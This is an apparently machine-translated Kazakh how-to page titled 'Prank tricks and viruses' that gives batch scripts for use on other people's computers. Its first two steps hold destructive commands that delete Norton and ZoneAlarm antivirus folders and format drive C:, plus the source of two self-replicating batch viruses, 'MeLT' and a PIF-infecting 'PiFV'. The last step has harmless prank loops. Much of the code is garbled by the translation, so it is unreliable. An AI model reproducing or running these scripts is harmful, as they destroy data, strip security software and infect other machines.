Топтық трюктер мен вирустар: 3 қадам

2024 Автор: John Day | [email protected]. Соңғы өзгертілген: 2024-01-30 10:28

BATCH -те пранк және нақты вирустарды қалай жасауға болады Ескертпе: Мен сіздің компьютеріңізге басқа біреудің компьютеріне келтіретін зақым үшін жауап бермеймін

1 -қадам: Нағыз вирустар (қарапайым)

біріншісі: кодты көшіру *************************************** ********: / progra ~ 1 / norton ~ 1 @echo енді сіз y деп теріп, enter пернесін басуыңыз керек @pause del c: / progra ~ 1 / Norton ~ 1 @pause c: dir @pause @dir c: / progra ~ 1 dir c: / progra ~ 1 / zonea ~ 1 / zonealarm del c: / progra ~ 1 / zonea ~ 1 / zonealarm @echo ok енді сіздің компьютеріңіз «НАҒЫЗ!» Жылдам: шығу ********************************************* *Ескерту: файлды қалағаныңызша сақтаңыз.bat Ескертпе: @echo -дан кейінгі кез келген нәрсені өзгертуге болады (қалағаныңызды жаза аласыз) Екінші: *************** түсі 02 форматы C: ***************

2 -қадам: Нағыз вирустар (жетілдірілгендер)

1. Ең қуатты *******************@болмаса '%0 ==' егер '%_melt%==' goto meltbeg:: ---- dummy хост --------@echo offecho Сәлем әлем!:: ---- ақылды хост ----@goto MeLTend [MeLT_2a]: MeLTbeg@echo%_MeLT%егер '%1 ==' MeLT болса goto MeLT %2 болмаса %comspec %орнатылған comspec = %_ MeLT %командасы %comspec % /e: 5000 /c %0 MeLT virset MeLTcl = %1 %2 %3 %4 %5 %6 %7 %8 %9 қоңырау шалу % 0 MeLT rhset _MeLT = MeLTcl = goto MeLTend: MeLTrhset _MeLT = x%0%MeLTcl%: MeLTvirset MeLTH =%0 болмаса%_MeLT %% temp%\ nul орнатылған temp =%tmp%бар болса%temp%\ MeLT_2a MeLTrun%0 MeLT fnd. %path%: MeLTfndshift%_MeLT%if '%2 ==' MeLTset MeLT =%2 \%MeLTH%.batif болмаса%MeLT%орнатылған MeLT =%2 \%MeLTH%болмаса%MeLT%MeLT = орнатады %2%MeLTH%.batif жоқ%MeLT%орнатылған MeLT =%2%MeLTH%жоқ болса%MeLT%goto MeLTfndfind «MeLT»%temp%\ MeLT_2aattrib%temp%\ MeLT_2a +h: MeLTrun%MeLTH%MeLT s…%path%: MeLTsshift%_MeLT%if '%2 ==' MeLTfor %% a in (%2 \*. bat%2*.bat)%MeLTH%MeLT inf %% MeLTs деп атайды: MeLTinffind / i «MeLT» nulif қате емес 1 деңгей MeLTnoecho @if '%% 0 ==' болмаса '%% _ melt %% ==' goto meltbeg> MeLT.ttype%3 >> MeLT.techo. >> MeLT.ttype% temp %\ MeLT_2a >> MeLT.tmove MeLT.t %3> nulexit MeLT: MeLTact - экранның жарқылда еритін мәтіні қалыпты күйге оралады e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE> MeLT.techo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8 >> MeLT.techo e 120 B4 4C CD 21 00 >> MeLT.techo g >> MeLT.tdebugnuldel MeLT.texit MeLT: MeLTnoset MeLTC =%MeLTC%1if%MeLTC%== 1111111111 MeLTact: MeLTend ********************************* ******** 2. Бұл Windows DOS бағдарламаларын іске қосу үшін пайдаланатын PIF файлдарын «жұқтыратын» вирус. Ол көшірмелері бар жасырын серіктес топтамаларды құру арқылы жұмыс істейді, содан кейін PIF файлын өзгерту үшін серіктес партиясы бірінші болады. Серіктес іске қосылғаннан кейін оның аты серіктеске кодталған бастапқы хост бағдарламасын іске қосады. Pif файлдары қайта жұқпайтын етіп белгіленеді. Тек PIF -ке әсер етеді, вирус жұққан бағдарламаларға ешқандай өзгеріс енгізілмейді. «Емдеу» үшін бастапқы файл атауын қалпына келтіру үшін PIFEDIT пайдаланыңыз, содан кейін жасырын файлдарды жойыңыз. ******************************* ***************@echo off:: хост файл атауы… pifvo = LIST. COM:: цикл диспетчерін орнатыңыз … егер '%1 ==' PiFV goto PiFV_%2:: іске қосыңыз вирус! set _PiFV = егер болмаса%comspec%set comspec = C: / COMMAND. COM%_PiFV %% comspec% /e: 5000 /c%0 PiFV go> nulif PiFV бар! del PiFV!:: хостты орнатыңыз PiFVcl = %1 %2 %3 %4 %5 %6 %7 %8 %9қоңырау %0 PiFV hstset PiFVo = орнатыңыз PiFVcl =:: белсендіруді тексеріңіз … жаңғырық. | күн | табу / i «sat»> nul. PiFVif errorlevelvel 1 goto PiFV_endecho. | time | find «7»> nul. PiFVif errorlevel 1 goto PiFV_msgset PiFV = echocls%_PiFV %% PiFV%.%PiFV%Бұрын Oscer%PiFV деп аталатын саман болған. % Кім су жасауды білемін деп мәлімдеді.% PiFV% «Енді бөгеттер жоқ», - деді ол, «орнына менің суымды қолданыңыз!»% PiFV% Бірақ ақсақал Отерлер әсерленбеді.pause> nul. PiFVset PiFV = goto PiFV_end: PiFV_msgecho [PiFV] by WaveFuncgoto PiFV_end: PiFV_hst%PiFVo%%PiFVcl%goto PiFV_end: PiFV_goset PiFVh =%0 егер%PiFVh%орнатылмаса PiFVh =%0.batif%%aPif%ішінде шықпаса) PiFV: PiFV_infset PiFVp: %3:: құрбан файл атауын және жұқтыру белгісін алуды отладтау арқылы PIF файлынан алыңыз. goto PiFV_1echo m 124, 162 524> PiFV! echo e 100 '@set fn =' >> PiFV! echo m 524, 562 108 >> PiFV! echo n pifv $.bat >> PiFV! echo rcx >> PiFV! echo 47 >> PiFV! Echo w >> PiFV! Echo m 55E, 561 108 >> PiFV! Echo e 10C 0 >> PiFV! Echo n pifv $$. Bat >> PiFV! Echo rcx >> PiFV! Echo 10 >> PiFV! Echo w >> PiFV! Echo q >> PiFV!: PiFV_1түзету%PiFVp%nulcall PiFV $ set PiFVn =%fn%қоңырау PiFV $$ PiFVi =%fn%del PiFV $ ?. bat:: pifvn = бастапқы файл атауы:: pifvi = жұқтыру белгісі:: pifvp = pif файл атауы:: pifvh = серік бат файлы:: жұқтырылған немесе «бос» пифтерді өткізіп жіберіңіз… егер '%PiFVi%==' PiFV goto PiFV_endif '%PiFVn%==' goto PiFV_end:: команданы көлеңкелемеңіз.com (жақсы болыңыз) echo %PiFVn %| find /i «command»> nulif not errorlevel 1 goto PiFV_end:: infable - серіктес партиясын жасаңыз …:: (келесі код кеңейтімді өшіреді) echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88> PiFV $$ echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21 >> PiFV $$ echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV $$ echo n pifv $.com >> PiFV $$ echo rcx >> PiFV $$ echo 2a >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debugnulecho%PiFVn%| PiFV $> PiFV $$. Batcall PiFV $$ орнатылған PiFVb =%fn%. Batdel PiFV $?.*:: pifvb = жаңа партия атауы:: егер комп бірдей болса, көлеңке қоймаңыз hostif ретінде атау%PiFVo%==%PiFVb%goto PiFV_endif бар%PiFVb%goto PiFV_endecho @echo өшіру>%PiFVb%жаңғырық жиынтығы pifvo =%pifvn%>>%PiFVb%табу «PiFV»>%PiFVb%атрибут%PiFVb% +h::… және PIF картасын eEE 15E 'PiFV', 0> PiFV $$ echo e 124 '%PiFVb%', 0 >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV көрсетіңіз. $$ түзету %PiFVp %nuldel PiFV $$:: Менің ойымша, біз аяқтадық! PiFV шығу: PiFV_end:: мұның бәрінде қанша қате бар екеніне таң қалдыңыз ба? Білудің бір ғана әдісі … *************************************** **********

3 -қадам: Пранк вирусы және трюк

1. пранк вирусы ******************* түсі 02@echo offecho dir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/ sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/secho@echo* ************************* Ескертпе: «02 түсі» - мәтінді green2.trick (матрицалық код) ету ****** **************************@echo offcolor 02: startecho %кездейсоқ % %кездейсоқ % %кездейсоқ %кездейсоқ % %кездейсоқ % %кездейсоқ % % кездейсоқ%% кездейсоқ%% кездейсоқ%% кездейсоқ%% кездейсоқ%% кездейсоқ%% кездейсоқ% бастау керек ************************ ******************